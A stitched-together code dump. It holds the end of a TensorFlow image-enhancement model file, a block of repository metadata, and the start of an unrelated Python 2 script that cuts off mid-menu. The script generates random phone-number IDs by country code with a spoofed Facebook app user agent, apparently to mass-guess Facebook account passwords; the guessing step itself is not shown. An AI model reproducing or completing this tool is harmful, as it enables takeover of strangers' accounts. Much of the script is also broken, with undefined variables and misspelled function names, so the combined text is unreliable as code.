out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut1 = out
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = layers.add([shortcut1, out])
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut2, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(1, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([gray_in, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def CreateModel_M64_color(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut1 = out
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = res_net_block(out, 64, 3)
out = layers.add([shortcut1, out])
out = layers.Conv2D(64, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut2, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(3, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([X_input, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def GetModel(model_name='M32',gray=True,block_size=(None,None),batch_size=None):
input_shape = (block_size[0],block_size[1],3)
if(model_name=='M64'):
if(gray):
return CreateModel_M64_binary(input_shape,batch_size)
else:
return CreateModel_M64_color(input_shape,batch_size)
elif(model_name=='M32'):
if(gray):
return CreateModel_M32_binary(input_shape,batch_size)
else:
return CreateModel_M32_color(input_shape,batch_size)
else:
if(gray):
return CreateModel_M16_binary(input_shape,batch_size)
else:
return CreateModel_M16_color(input_shape,batch_size)
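# Minimal usage sketch, assuming TensorFlow 2.x; the 256x256 block size is an arbitrary example value.
if __name__ == '__main__':
    # Build the 32-filter grayscale-output model for 256x256 RGB inputs and list its layers.
    demo_model = GetModel(model_name='M32', gray=True, block_size=(256, 256), batch_size=None)
    demo_model.summary()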
| 51.662222
| 178
| 0.690898
| 1,644
| 11,624
| 4.694647
| 0.054136
| 0.090956
| 0.093288
| 0.081239
| 0.919409
| 0.89531
| 0.887665
| 0.887536
| 0.869655
| 0.869655
| 0
| 0.036934
| 0.168445
| 11,624
| 224
| 179
| 51.892857
| 0.761535
| 0.033465
| 0
| 0.829016
| 0
| 0
| 0.042553
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046632
| false
| 0
| 0.031088
| 0
| 0.150259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b185bc689ca42d680ac0e7059530294329898a23
| 27,309
|
py
|
Python
|
Time.py
|
Somi190/action
|
6f580528243decc495a8e2d9ac256ae4803d3e6b
|
[
"Apache-2.0"
] | null | null | null |
Time.py
|
Somi190/action
|
6f580528243decc495a8e2d9ac256ae4803d3e6b
|
[
"Apache-2.0"
] | null | null | null |
Time.py
|
Somi190/action
|
6f580528243decc495a8e2d9ac256ae4803d3e6b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
# Ustad # SIDRA5 # Thuglife # Somibro # Gamz
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
print 'Then type: python2 boss'
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;92m
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
██████╗░███████╗░█████╗░██╗░░░░░
██╔══██╗██╔════╝██╔══██╗██║░░░░░
██████╔╝█████╗░░███████║██║░░░░░
██╔══██╗██╔══╝░░██╔══██║██║░░░░░
██║░░██║███████╗██║░░██║███████╗
╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚══════╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
╭┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳╮
┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃
╰┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻╯
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
░██████╗████████╗░█████╗░██████╗░
██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
╚█████╗░░░░██║░░░███████║██████╔╝
░╚═══██╗░░░██║░░░██╔══██║██╔══██╗
██████╔╝░░░██║░░░██║░░██║██║░░██║
╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
"""
####Logo####
logo1 = """
\033[1;92m
<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
██████╗░░█████╗░███╗░░██╗░██████╗░██╗░░░░░░█████╗░
██╔══██╗██╔══██╗████╗░██║██╔════╝░██║░░░░░██╔══██╗
██████╦╝███████║██╔██╗██║██║░░██╗░██║░░░░░███████║
██╔══██╗██╔══██║██║╚████║██║░░╚██╗██║░░░░░██╔══██║
██████╦╝██║░░██║██║░╚███║╚██████╔╝███████╗██║░░██║
╚═════╝░╚═╝░░╚═╝╚═╝░░╚══╝░╚═════╝░╚══════╝╚═╝░░╚═╝
<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
"""
logo2 = """
\033[1;92m
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
██████╗░███████╗░█████╗░██╗░░░░░
██╔══██╗██╔════╝██╔══██╗██║░░░░░
██████╔╝█████╗░░███████║██║░░░░░
██╔══██╗██╔══╝░░██╔══██║██║░░░░░
██║░░██║███████╗██║░░██║███████╗
╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚══════╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
╭┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳┳╮
┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃┃
╰┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻╯
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
░██████╗████████╗░█████╗░██████╗░
██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
╚█████╗░░░░██║░░░███████║██████╔╝
░╚═══██╗░░░██║░░░██╔══██║██╔══██╗
██████╔╝░░░██║░░░██║░░██║██║░░██║
╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝
"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷"̷
<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
██████╗░░█████╗░███╗░░██╗░██████╗░██╗░░░░░░█████╗░
██╔══██╗██╔══██╗████╗░██║██╔════╝░██║░░░░░██╔══██╗
██████╦╝███████║██╔██╗██║██║░░██╗░██║░░░░░███████║
██╔══██╗██╔══██║██║╚████║██║░░╚██╗██║░░░░░██╔══██║
██████╦╝██║░░██║██║░╚███║╚██████╔╝███████╗██║░░██║
╚═════╝░╚═╝░░╚═╝╚═╝░░╚══╝░╚═════╝░╚══════╝╚═╝░░╚═╝
<̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷_̷>̷
"""
CorrectUsername = "Real"
CorrectPassword = "Star"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m\x1b[1;92mU/N \x1b[1;93m♦⚫█▶\x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m \x1b[1;92mU/P \x1b[1;93m♦⚫█▶\x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:SOMI
time.sleep(2)
loop = 'false'
else:
print "\033[1;94mWrong Password"
os.system('xdg-open https://m.facebook.comSOMIMISICAN.com')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://m.facebook.comSOMIMUSICAN.com')
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;91m[1]\x1b[1;97mSTART WITH REAL STAR( \033[1;92m NOW)"
time.sleep(0.05)
print '\x1b[1;94m[0]\033[1;91m Exit ( Back)'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
if peak =="":
print "\x1b[1;97mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[1] Bangladesh\033[1;91m☆.\x1b[1;96m[14] Australia'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[2] U.S.A \033[1;91m☆.\x1b[1;96m[15] Canada'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[3] U.K \033[1;91m☆.\x1b[1;96m[16] China'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[4] India \033[1;91m☆.\x1b[1;96m[17] Denmark'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[5] Brazil \033[1;91m☆.\x1b[1;96m[18] France'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[6] Japan \033[1;91m☆.\x1b[1;96m[19] Germany'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[7] Korea \033[1;91m☆.\x1b[1;96m[20] Malaysia'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[8] Italy \033[1;91m☆.\x1b[1;96m[21] Srilanka'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[9] Spain \033[1;91m☆.\x1b[1;96m[22] Turkey'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[10] Poland \033[1;91m☆.\x1b[1;96m[23] U.A.E'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[11] Pakistan \033[1;91m☆.\x1b[1;96m[24] SaudiArabia'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[12] Indonesia \033[1;91m☆.\x1b[1;96m[25] Israel'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;96m[13] Greece \033[1;91m☆.\x1b[1;96m[26] Iran'
time.sleep(0.05)
print '\033[1;93m-•◈•-\033[1;97m> \033[1;91m☆.\x1b[1;91m[0] Back '
time.sleep(0.05)
action()
def action():
FreakedDudex = raw_input('\n\033[1;91mChoose an Option>>> \033[1;95m')
if FreakedDudex =='':
print '[!] Fill in correctly'
action()
elif FreakedDudex =="1":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m175,165,191, 192, 193, 194, 195, 196, 197, 198, 199")
try:
c = raw_input("\033[1;95m choose code : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="2":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m555,786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708")
try:
c = raw_input("\033[1;95m choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="3":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m715,785,765,725,745,735,737, 706, 748, 783, 739, 759, 790")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+44"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="4":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m905,975,755,855,954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="5":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m127, 179, 117, 853, 318, 219, 834, 186, 479, 113")
try:
c = raw_input("\033[1;95m choose code : ")
k="+55"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="6":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m11, 12, 19, 16, 15, 13, 14, 18, 17")
try:
c = raw_input("\033[1;95m choose code : ")
k="+81"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="7":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m1, 2, 3, 4, 5, 6, 7, 8, 9")
try:
c = raw_input("\033[1;95m choose code : ")
k="+82"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="8":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m311,323,385,388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328")
try:
c = raw_input("\033[1;95m choose code : ")
k="+39"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="9":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m655,755,60, 76, 73, 64, 69, 77, 65, 61, 75, 68")
try:
c = raw_input("\033[1;95m choose code : ")
k="+34"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="10":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m66, 69, 78, 79, 60, 72, 67, 53, 51")
try:
c = raw_input("\033[1;95m choose code : ")
k="+48"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="11":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m01, ~to~~, 49")
try:
c = raw_input("\033[1;95m choose code : ")
k="03"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="12":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m81,83,85,84,89,")
try:
c = raw_input("\033[1;95m choose code : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="13":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first four digits and the last seven digits of any phone number in this country.Write the remaining digits here.69,693,698,694,695")
try:
c = raw_input("\033[1;95m choose code : ")
k="+3069"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakedDudex =="14":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.455")
try:
c = raw_input("\033[1;95m choose code : ")
k="+61"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="15":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first one digits and the last seven digits of any phone number in this country.Write the remaining digits here.555,")
try:
c = raw_input("\033[1;95m choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakedDudex()
elif FreakedDudex =="16":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.1355,1555,1855,")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+86"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakexDudex =="17":
print (logo1)
os.system("clear")
print (logo2)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.2,3,4,5,6,7,8")
try:
c = raw_input(" \033[1;95mchoose code : ")
k="+45"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
FreakexDudex()
elif FreakedDudex =="18":
print (logo1)
os.system("clear")
print (logo1)
print("\033[1;93m(leave the first two digits and the last seven digits of any phone number in this country.Write the remaining digits here.65,70,73,74,76,77")
try:
c = raw_input("\033[1;95m choose code : ")
k="+33"
idlist = ('.txt')
